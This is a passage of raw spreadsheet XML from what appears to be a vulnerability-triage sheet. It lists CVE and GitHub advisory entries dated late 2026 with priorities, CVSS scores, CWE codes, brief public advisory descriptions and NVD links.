t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80114</t></is></c></row><row r="580"><c r="A580" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B580" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C580" s="5" t="inlineStr"><is><t>CVE-2026-80116</t></is></c><c r="D580" s="5" t="n"><v>8.5</v></c><c r="E580" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F580" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G580" s="5" t="inlineStr" /><c r="H580" s="5" t="n"><v>0.001</v></c><c r="I580" s="5" t="inlineStr" /><c r="J580" s="5" t="inlineStr" /><c r="K580" s="5" t="inlineStr" /><c r="L580" s="5" t="inlineStr" /><c r="M580" s="5" t="inlineStr" /><c r="N580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O580" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P580" s="5" t="inlineStr" /><c r="Q580" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="R580" s="5" t="inlineStr"><is><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is></c><c r="S580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80116</t></is></c></row><row r="581"><c r="A581" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B581" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C581" s="5" t="inlineStr"><is><t>CVE-2026-80119</t></is></c><c r="D581" s="5" t="n"><v>8.5</v></c><c r="E581" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F581" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G581" s="5" t="inlineStr" /><c r="H581" s="5" t="n"><v>0.001</v></c><c r="I581" s="5" t="inlineStr" /><c r="J581" s="5" t="inlineStr" /><c r="K581" s="5" t="inlineStr" /><c r="L581" s="5" t="inlineStr" /><c r="M581" s="5" t="inlineStr" /><c r="N581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O581" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P581" s="5" t="inlineStr" /><c r="Q581" s="5" t="inlineStr"><is><t>CWE-497, CWE-73</t></is></c><c r="R581" s="5" t="inlineStr"><is><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is></c><c r="S581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80119</t></is></c></row><row r="582"><c r="A582" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B582" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C582" s="5" t="inlineStr"><is><t>CVE-2026-81302</t></is></c><c r="D582" s="5" t="n"><v>8.5</v></c><c r="E582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F582" s="5" t="inlineStr"><is><t>vultures@jpcert.or.jp</t></is></c><c r="G582" s="5" t="inlineStr" /><c r="H582" s="5" t="n"><v>0.002</v></c><c r="I582" s="5" t="inlineStr" /><c r="J582" s="5" t="inlineStr" /><c r="K582" s="5" t="inlineStr" /><c r="L582" s="5" t="inlineStr" /><c r="M582" s="5" t="inlineStr" /><c r="N582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O582" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P582" s="5" t="inlineStr" /><c r="Q582" s="5" t="inlineStr"><is><t>CWE-276</t></is></c><c r="R582" s="5" t="inlineStr"><is><t>PALLET CONTROL products contain an incorrect default permission vulnerability, which may allow a local attacker to execute arbitrary code with SYSTEM privileges on the affected product.</t></is></c><c r="S582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81302</t></is></c></row><row r="583"><c r="A583" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B583" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C583" s="5" t="inlineStr"><is><t>CVE-2026-85012</t></is></c><c r="D583" s="5" t="n"><v>8.5</v></c><c r="E583" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F583" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G583" s="5" t="inlineStr" /><c r="H583" s="5" t="n"><v>0.012</v></c><c r="I583" s="5" t="inlineStr" /><c r="J583" s="5" t="inlineStr" /><c r="K583" s="5" t="inlineStr" /><c r="L583" s="5" t="inlineStr" /><c r="M583" s="5" t="inlineStr" /><c r="N583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O583" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P583" s="5" t="inlineStr" /><c r="Q583" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R583" s="5" t="inlineStr"><is><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is></c><c r="S583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85012</t></is></c></row><row r="584"><c r="A584" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C584" s="5" t="inlineStr"><is><t>CVE-2026-85384</t></is></c><c r="D584" s="5" t="n"><v>8.5</v></c><c r="E584" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F584" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G584" s="5" t="inlineStr" /><c r="H584" s="5" t="n"><v>0.002</v></c><c r="I584" s="5" t="inlineStr" /><c r="J584" s="5" t="inlineStr" /><c r="K584" s="5" t="inlineStr" /><c r="L584" s="5" t="inlineStr" /><c r="M584" s="5" t="inlineStr" /><c r="N584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P584" s="5" t="inlineStr" /><c r="Q584" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R584" s="5" t="inlineStr"><is><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is></c><c r="S584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t></is></c></row><row r="585"><c r="A585" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B585" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C585" s="5" t="inlineStr"><is><t>CVE-2026-85439</t></is></c><c r="D585" s="5" t="n"><v>8.5</v></c><c r="E585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F585" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G585" s="5" t="inlineStr" /><c r="H585" s="5" t="n"><v>0.003</v></c><c r="I585" s="5" t="inlineStr" /><c r="J585" s="5" t="inlineStr" /><c r="K585" s="5" t="inlineStr" /><c r="L585" s="5" t="inlineStr" /><c r="M585" s="5" t="inlineStr" /><c r="N585" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O585" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P585" s="5" t="inlineStr" /><c r="Q585" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R585" s="5" t="inlineStr"><is><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is></c><c r="S585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85439</t></is></c></row><row r="586"><c r="A586" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B586" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C586" s="5" t="inlineStr"><is><t>CVE-2026-85656</t></is></c><c r="D586" s="5" t="n"><v>8.5</v></c><c r="E586" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F586" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G586" s="5" t="inlineStr" /><c r="H586" s="5" t="n"><v>0.011</v></c><c r="I586" s="5" t="inlineStr" /><c r="J586" s="5" t="inlineStr"><is><t>log4j</t></is></c><c r="K586" s="5" t="inlineStr" /><c r="L586" s="5" t="inlineStr" /><c r="M586" s="5" t="inlineStr" /><c r="N586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O586" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P586" s="5" t="inlineStr" /><c r="Q586" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R586" s="5" t="inlineStr"><is><t>An OS command injection issue in the log4j-cve-2021-44228-hotpatch package in Amazon Linux before 1.3-9 might allow a local user to execute arbitrary commands with root privileges via a Java process whose executable path contains embedded newline characters.</t></is></c><c r="S586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t></is></c></row><row r="587"><c r="A587" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B587" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C587" s="5" t="inlineStr"><is><t>CVE-2026-86095</t></is></c><c r="D587" s="5" t="n"><v>8.5</v></c><c r="E587" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F587" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G587" s="5" t="inlineStr" /><c r="H587" s="5" t="n"><v>0.001</v></c><c r="I587" s="5" t="inlineStr" /><c r="J587" s="5" t="inlineStr" /><c r="K587" s="5" t="inlineStr" /><c r="L587" s="5" t="inlineStr" /><c r="M587" s="5" t="inlineStr" /><c r="N587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O587" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P587" s="5" t="inlineStr" /><c r="Q587" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R587" s="5" t="inlineStr"><is><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is></c><c r="S587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86095</t></is></c></row><row r="588"><c r="A588" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C588" s="5" t="inlineStr"><is><t>CVE-2026-69479</t></is></c><c r="D588" s="5" t="n"><v>8.4</v></c><c r="E588" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F588" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G588" s="5" t="inlineStr" /><c r="H588" s="5" t="n"><v>0.003</v></c><c r="I588" s="5" t="inlineStr" /><c r="J588" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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8" s="5" t="inlineStr" /><c r="M588" s="5" t="inlineStr" /><c r="N588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P588" s="5" t="inlineStr" /><c r="Q588" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R588" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t></is></c></row><row r="589"><c r="A589" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C589" s="5" t="inlineStr"><is><t>CVE-2026-69638</t></is></c><c r="D589" s="5" t="n"><v>8.4</v></c><c r="E589" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F589" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G589" s="5" t="inlineStr" /><c r="H589" s="5" t="n"><v>0.003</v></c><c r="I589" s="5" t="inlineStr" /><c r="J589" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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589" s="5" t="inlineStr" /><c r="M589" s="5" t="inlineStr" /><c r="N589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P589" s="5" t="inlineStr" /><c r="Q589" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R589" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t></is></c></row><row r="590"><c r="A590" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C590" s="5" t="inlineStr"><is><t>CVE-2026-75999</t></is></c><c r="D590" s="5" t="n"><v>8.4</v></c><c r="E590" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F590" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G590" s="5" t="inlineStr" /><c r="H590" s="5" t="n"><v>0.004</v></c><c r="I590" s="5" t="inlineStr" /><c r="J590" s="5" t="inlineStr" /><c r="K590" s="5" t="inlineStr" /><c r="L590" s="5" t="inlineStr" /><c r="M590" s="5" t="inlineStr" /><c r="N590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P590" s="5" t="inlineStr" /><c r="Q590" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R590" s="5" t="inlineStr"><is><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is></c><c r="S590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t></is></c></row><row r="591"><c r="A591" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B591" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C591" s="5" t="inlineStr"><is><t>CVE-2026-76228</t></is></c><c r="D591" s="5" t="n"><v>8.4</v></c><c r="E591" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F591" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G591" s="5" t="inlineStr" /><c r="H591" s="5" t="n"><v>0.008</v></c><c r="I591" s="5" t="inlineStr" /><c r="J591" s="5" t="inlineStr" /><c r="K591" s="5" t="inlineStr" /><c r="L591" s="5" t="inlineStr" /><c r="M591" s="5" t="inlineStr" /><c r="N591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O591" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P591" s="5" t="inlineStr" /><c r="Q591" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R591" s="5" t="inlineStr"><is><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is></c><c r="S591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76228</t></is></c></row><row r="592"><c r="A592" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B592" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C592" s="5" t="inlineStr"><is><t>CVE-2026-76229</t></is></c><c r="D592" s="5" t="n"><v>8.4</v></c><c r="E592" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F592" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G592" s="5" t="inlineStr" /><c r="H592" s="5" t="n"><v>0.007</v></c><c r="I592" s="5" t="inlineStr" /><c r="J592" s="5" t="inlineStr" /><c r="K592" s="5" t="inlineStr" /><c r="L592" s="5" t="inlineStr" /><c r="M592" s="5" t="inlineStr" /><c r="N592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O592" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P592" s="5" t="inlineStr" /><c r="Q592" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R592" s="5" t="inlineStr"><is><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is></c><c r="S592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76229</t></is></c></row><row r="593"><c r="A593" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B593" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C593" s="5" t="inlineStr"><is><t>CVE-2026-76230</t></is></c><c r="D593" s="5" t="n"><v>8.4</v></c><c r="E593" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F593" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G593" s="5" t="inlineStr" /><c r="H593" s="5" t="n"><v>0.008999999999999999</v></c><c r="I593" s="5" t="inlineStr" /><c r="J593" s="5" t="inlineStr" /><c r="K593" s="5" t="inlineStr" /><c r="L593" s="5" t="inlineStr" /><c r="M593" s="5" t="inlineStr" /><c r="N593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O593" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P593" s="5" t="inlineStr" /><c r="Q593" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R593" s="5" t="inlineStr"><is><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is></c><c r="S593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76230</t></is></c></row><row r="594"><c r="A594" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B594" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C594" s="5" t="inlineStr"><is><t>CVE-2026-76231</t></is></c><c r="D594" s="5" t="n"><v>8.4</v></c><c r="E594" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F594" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G594" s="5" t="inlineStr" /><c r="H594" s="5" t="n"><v>0.008999999999999999</v></c><c r="I594" s="5" t="inlineStr" /><c r="J594" s="5" t="inlineStr" /><c r="K594" s="5" t="inlineStr" /><c r="L594" s="5" t="inlineStr" /><c r="M594" s="5" t="inlineStr" /><c r="N594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O594" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P594" s="5" t="inlineStr" /><c r="Q594" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R594" s="5" t="inlineStr"><is><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is></c><c r="S594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76231</t></is></c></row><row r="595"><c r="A595" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B595" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C595" s="5" t="inlineStr"><is><t>CVE-2026-76232</t></is></c><c r="D595" s="5" t="n"><v>8.4</v></c><c r="E595" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F595" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G595" s="5" t="inlineStr" /><c r="H595" s="5" t="n"><v>0.008999999999999999</v></c><c r="I595" s="5" t="inlineStr" /><c r="J595" s="5" t="inlineStr" /><c r="K595" s="5" t="inlineStr" /><c r="L595" s="5" t="inlineStr" /><c r="M595" s="5" t="inlineStr" /><c r="N595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O595" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P595" s="5" t="inlineStr" /><c r="Q595" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R595" s="5" t="inlineStr"><is><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is></c><c r="S595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76232</t></is></c></row><row r="596"><c r="A596" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B596" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C596" s="5" t="inlineStr"><is><t>CVE-2026-76233</t></is></c><c r="D596" s="5" t="n"><v>8.4</v></c><c r="E596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F596" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G596" s="5" t="inlineStr" /><c r="H596" s="5" t="n"><v>0.008999999999999999</v></c><c r="I596" s="5" t="inlineStr" /><c r="J596" s="5" t="inlineStr" /><c r="K596" s="5" t="inlineStr" /><c r="L596" s="5" t="inlineStr" /><c r="M596" s="5" t="inlineStr" /><c r="N596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O596" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P596" s="5" t="inlineStr" /><c r="Q596" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R596" s="5" t="inlineStr"><is><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is></c><c r="S596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76233</t></is></c></row><row r="597"><c r="A597" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B597" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C597" s="5" t="inlineStr"><is><t>CVE-2026-76838</t></is></c><c r="D597" s="5" t="n"><v>8.4</v></c><c r="E597" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F597" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G597" s="5" t="inlineStr" /><c r="H597" s="5" t="n"><v>0.003</v></c><c r="I597" s="5" t="inlineStr" /><c r="J597" s="5" t="inlineStr" /><c r="K597" s="5" t="inlineStr" /><c r="L597" s="5" t="inlineStr" /><c r="M597" s="5" t="inlineStr" /><c r="N597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O597" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P597" s="5" t="inlineStr" /><c r="Q597" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R597" s="5" t="inlineStr"><is><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is></c><c r="S597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76838</t></is></c></row><row r="598"><c r="A598" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C598" s="5" t="inlineStr"><is><t>CVE-2026-77827</t></is></c><c r="D598" s="5" t="n"><v>8.4</v></c><c r="E598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F598" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G598" s="5" t="inlineStr" /><c r="H598" s="5" t="n"><v>0.002</v></c><c r="I598" s="5" t="inlineStr" /><c r="J598" s="5" t="inlineStr" /><c r="K598" s="5" t="inlineStr" /><c r="L598" s="5" t="inlineStr" /><c r="M598" s="5" t="inlineStr" /><c r="N598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P598" s="5" t="inlineStr" /><c r="Q598" s="5" t="inlineStr"><is><t>CWE-428</t></is></c><c r="R598" s="5" t="inlineStr"><is><t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t></is></c><c r="S598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t></is></c></row><row r="599"><c r="A599" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B599" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C599" s="5" t="inlineStr"><is><t>CVE-2026-85613</t></is></c><c r="D599" s="5" t="n"><v>8.4</v></c><c r="E599" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F599" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G599" s="5" t="inlineStr" /><c r="H599" s="5" t="n"><v>0.002</v></c><c r="I599" s="5" t="inlineStr" /><c r="J599" s="5" t="inlineStr" /><c r="K599" s="5" t="inlineStr" /><c r="L599" s="5" t="inlineStr" /><c r="M599" s="5" t="inlineStr" /><c r="N599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O599" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P599" s="5" t="inlineStr" /><c r="Q599" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R599" s="5" t="inlineStr"><is><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is></c><c r="S599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85613</t></is></c></row><row r="600"><c r="A600" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C600" s="5" t="inlineStr"><is><t>CVE-2026-86819</t></is></c><c r="D600" s="5" t="n"><v>8.4</v></c><c r="E600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F600" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G600" s="5" t="inlineStr" /><c r="H600" s="5" t="n"><v>0.001</v></c><c r="I600" s="5" t="inlineStr" /><c r="J600" s="5" t="inlineStr" /><c r="K600" s="5" t="inlineStr" /><c r="L600" s="5" t="inlineStr" /><c r="M600" s="5" t="inlineStr" /><c r="N600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P600" s="5" t="inlineStr" /><c r="Q600" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R600" s="5" t="inlineStr"><is><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is></c><c r="S600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t></is></c></row><row r="601"><c r="A601" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B601" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C601" s="5" t="inlineStr"><is><t>GHSA-3vrx-526r-64rm</t></is></c><c r="D601" s="5" t="n"><v>8.4</v></c><c r="E601" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F601" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G601" s="5" t="inlineStr" /><c r="H601" s="5" t="inlineStr" /><c r="I601" s="5" t="inlineStr" /><c r="J601" s="5" t="inlineStr" /><c r="K601" s="5" t="inlineStr" /><c r="L601" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M601" s="5" t="inlineStr" /><c r="N601" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O601" s="5" t="inlineStr" /><c r="P601" s="5" t="inlineStr" /><c r="Q601" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R601" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hmq2-w58f-27jc. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 fails to validate submodule names from .gitmodules files, allowing attackers to create Git repositories at arbitrary filesystem paths outside the intended clone directory. Attackers can craft malicious repositories with traversal sequences in submodule names that GitPython processes during submodule initialization, creating attacker-controlled Git repositories at escaped filesystem locations.</t></is></c><c r="S601" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-3vrx-526r-64rm</t></is></c></row><row r="602"><c r="A602" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C602" s="5" t="inlineStr"><is><t>CVE-2026-19203</t></is></c><c r="D602" s="5" t="n"><v>8.300000000000001</v></c><c r="E602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F602" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G602" s="5" t="inlineStr" /><c r="H602" s="5" t="n"><v>0.003</v></c><c r="I602" s="5" t="inlineStr" /><c r="J602" s="5" t="inlineStr" /><c r="K602" s="5" t="inlineStr" /><c r="L602" s="5" t="inlineStr" /><c r="M602" s="5" t="inlineStr" /><c r="N602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P602" s="5" t="inlineStr" /><c r="Q602" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R602" s="5" t="inlineStr"><is><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is></c><c r="S602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t></is></c></row><row r="603"><c r="A603" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B603" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C603" s="5" t="inlineStr"><is><t>CVE-2026-52769</t></is></c><c r="D603" s="5" t="n"><v>8.300000000000001</v></c><c r="E603" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F603" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G603" s="5" t="inlineStr" /><c r="H603" s="5" t="n"><v>0.003</v></c><c r="I603" s="5" t="inlineStr" /><c r="J603" s="5" t="inlineStr" /><c r="K603" s="5" t="inlineStr" /><c r="L603" s="5" t="inlineStr" /><c r="M603" s="5" t="inlineStr" /><c r="N603" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O603" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P603" s="5" t="inlineStr" /><c r="Q603" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R603" s="5" t="inlineStr"><is><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is></c><c r="S603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52769</t></is></c></row><row r="604"><c r="A604" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B604" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C604" s="5" t="inlineStr"><is><t>CVE-2026-52771</t></is></c><c r="D604" s="5" t="n"><v>8.300000000000001</v></c><c r="E604" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F604" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G604" s="5" t="inlineStr" /><c r="H604" s="5" t="n"><v>0.003</v></c><c r="I604" s="5" t="inlineStr" /><c r="J604" s="5" t="inlineStr" /><c r="K604" s="5" t="inlineStr" /><c r="L604" s="5" t="inlineStr" /><c r="M604" s="5" t="inlineStr" /><c r="N604" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O604" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P604" s="5" t="inlineStr" /><c r="Q604" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R604" s="5" t="inlineStr"><is><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is></c><c r="S604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52771</t></is></c></row><row r="605"><c r="A605" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B605" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c 